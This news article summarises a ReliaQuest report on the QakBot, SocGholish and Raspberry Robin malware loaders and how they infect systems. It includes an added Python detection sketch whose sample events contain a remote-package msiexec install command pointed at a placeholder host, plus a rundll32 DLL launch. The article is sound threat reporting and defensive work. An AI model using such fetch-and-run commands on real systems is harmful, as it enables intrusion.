Four in Five Cyber-Attacks Powered by Just Three Malware Loaders

Cybersecurity provider ReliaQuest observed that cyber-criminals used seven different malware loaders to deploy their intrusion campaigns in the first half of 2023.

Three of them, QakBot, SocGholish and Raspberry Robin, were the most popular loaders, accounting for 80% of all intrusions.

Top 7 most observed malware loaders, January 1-July 31, 2023, by percentage of all loaders observed. Source: ReliaQuest

QakBot, BlackBasta’s Preferred Tool

The first, QakBot (aka QBot, QuackBot, Pinkslipbot), was used in 30% of intrusions observed by ReliaQuest.

Active since 2009, QakBot is linked to the BlackBasta ransomware group and is used to target any industry. It was initially a banking trojan but later evolved into a malware loader that can deploy additional payloads, steal sensitive information, and enable lateral movement.

It is typically deployed via a phishing email that offers the recipient tailored lures: work orders, urgent requests, invoices, file attachments, or hyperlinks. These lead to the download of payloads in the form of PDFs, HTML scripts, or OneNote files.

QakBot then uses WSF, JavaScript, Batch, HTA, or LNK files that, when executed, typically establish persistence via scheduled task or registry run keys.

Finally, QakBot performs discovery commands and begins command-and-control (C2) communication to relay system/domain information and drop additional payloads (commonly, the remote-access tools “Atera” or “NetSupport,” along with “Cobalt Strike”) for post-exploitation objectives.

QakBot was recently observed by HP Wolf in its Threat Insights Report as the most active ransomware family of the second quarter of 2023.

SocGholish, Evil Corp’s Loader Since 2018

The second one, SocGholish (aka FakeUpdates), was involved in 27% of intrusions.

Associated with Evil Corp, an allegedly Russia-based group waging financially motivated cybercrime since at least 2007, SocGholish started to be used in 2018 against organizations in the accommodation and food services industry, retail trade, and legal services, primarily in the US.

It is a JavaScript-based loader that targets Microsoft Windows-based environments.

The malware is delivered via drive-by compromise (downloaded without user interaction). Visitors to a wide network of compromised websites are tricked into downloading ‘updates,’ typically through outdated browser prompts or other update lures for Microsoft Teams and Adobe Flash.

SocGholish is also linked to Exotic Lily, an initial access broker (IAB) active since at least September 2021. The IAB conducts highly sophisticated phishing campaigns to gain initial access to organizations and sell it to other threat actors.

In the first half of 2023, SocGholish’s operators conducted aggressive watering hole attacks. They compromised and infected the websites of large organizations engaged in common business operations with lucrative potential. Unsuspecting visitors inevitably downloaded the SocGholish payload, leading to widespread infections.

Raspberry Robin, a Worm-Turned-Loader Used by Various Groups

The third one, Raspberry Robin, was deployed in 23% of intrusions.

This malware loader is tied to various malicious groups, such as Evil Corp and Silence (aka Whisper Spider), a financially motivated threat actor targeting financial institutions in Ukraine, Russia, Azerbaijan, Poland, and Kazakhstan.

It has also been used to deliver multiple ransomware and other malware variants, such as “Clop,” “LockBit,” “TrueBot,” and “Flawed Grace,” in addition to the Cobalt Strike tool.

Raspberry Robin is a highly elusive worm-turned-loader that targets Microsoft Windows environments. Its exceptional propagation capabilities kick in after initial infection via malicious USB devices, when cmd.exe runs and executes a LNK file on the infected USB.

The LNK file contains commands triggering native Windows processes, such as msiexec.exe, to initiate an outbound connection to download the Raspberry Robin DLL.

Once the Raspberry Robin payload is running, additional processes are spawned using system binaries, such as rundll32.exe, odbcconf.exe, and control.exe, to run malicious code. This code injects itself into system processes (e.g., regsvr32.exe, rundll32.exe, dllhost.exe) to create scheduled tasks for persistence, to initiate C2 communication, and to deliver other payloads.
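A detection sketch for the process chain described above, added here as an example and not taken from ReliaQuest or the original article. It flags msiexec.exe launched by cmd.exe with a URL on its command line, then flags the system binaries the article names when they descend from that process; the event fields, sample records, and the `example.invalid` host are constructed, and PID reuse is ignored for brevity.

```python
import ntpath
import re

URL_RE = re.compile(r"https?://", re.IGNORECASE)
LOLBINS = {"rundll32.exe", "odbcconf.exe", "control.exe"}  # binaries named in the article

# Constructed process-creation records (Sysmon Event ID 1 style); not real telemetry.
EVENTS = [
    {"pid": 10, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 20, "ppid": 10, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "E:\drive.lnk"'},
    {"pid": 30, "ppid": 20, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": "msiexec.exe /q /i http://example.invalid/pkg"},
    {"pid": 40, "ppid": 30, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\Public\x.dll,Start"},
    # Benign: local MSI install started by the user from Explorer.
    {"pid": 50, "ppid": 10, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Installers\app.msi"},
    # Benign: Control Panel opened from Explorer.
    {"pid": 60, "ppid": 10, "image": r"C:\Windows\System32\control.exe", "cmd": "control.exe"},
]

def name(event):
    """Lower-cased executable name from a Windows image path."""
    return ntpath.basename(event["image"]).lower()

def detect(events):
    """Return (pid, reason) alerts; events must be in creation order."""
    by_pid, tainted, alerts = {}, set(), []
    for ev in events:
        by_pid[ev["pid"]] = ev
        parent = by_pid.get(ev["ppid"])
        if (name(ev) == "msiexec.exe" and URL_RE.search(ev["cmd"])
                and parent is not None and name(parent) == "cmd.exe"):
            tainted.add(ev["pid"])
            alerts.append((ev["pid"], "msiexec.exe fetching a remote package, launched by cmd.exe"))
        elif ev["ppid"] in tainted:
            tainted.add(ev["pid"])  # carry the lineage to every descendant
            if name(ev) in LOLBINS:
                alerts.append((ev["pid"], f"{name(ev)} descended from flagged msiexec.exe"))
    return alerts

if __name__ == "__main__":
    for pid, reason in detect(EVENTS):
        print(pid, reason)
```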

In 2023, Raspberry Robin has been used to target financial institutions, telecommunications, government, and manufacturing organizations, mainly in Europe, although the US has had its fair share of attacks.

SocGholish’s operators used Raspberry Robin in the first quarter of 2023 when heavily targeting legal and financial services organizations.

In its analysis, ReliaQuest warned that these findings cover the malware loaders detected in its telemetry. A detection therefore does not necessarily mean the targeted network was compromised.

“In the majority of cases we observed, the malware loader was detected and stopped early in the kill chain. But it’s crucial to not look away from the car-crash threat of any loader, especially the three most popular,” the company said.
